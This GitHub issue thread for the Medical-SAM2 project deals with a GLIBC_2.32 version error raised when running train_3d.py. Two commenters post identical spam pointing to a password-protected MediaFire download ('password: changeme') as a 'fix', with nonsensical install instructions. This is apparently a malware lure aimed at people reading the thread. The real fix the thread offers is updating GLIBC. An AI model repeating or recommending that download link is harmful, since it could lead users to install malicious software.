### ISSUE TITLE
training error

### ISSUE THREAD

**Issue by gogochen07** [MedicineToken/Medical-SAM2#25]
Hi, I have encountered the following error when running train_3d.py, could I know if you have any suggestions on it?

File "/data/humanBodyProject/repository_YC/Medical-SAM2/sam2_train/utils/misc.py", line 61, in get_connected_components
    from sam2_train import _C
ImportError: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.32' not found (required by /data/humanBodyProject/repository_YC/Medical-SAM2/sam2_train/_C.so)

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by ShanZard** [comment]
I also meet this error.

**Comment by ShanZard** [comment]
I have fixed this bug. It should update your GLIBC.

**Comment by jiayuanz3** [comment]
thanks for providing the solution and I'll close the issue

**Comment by BioBerl** [comment]
Running on ubuntu 20.04  i still got the version `GLIBC_2.32' not found (required by ... error, I tried installing GBLIB_2.32 from http://ftp.gnu.org/gnu/libc/glibc-2.32.tar.gz but I still got the same error. What can I do ?
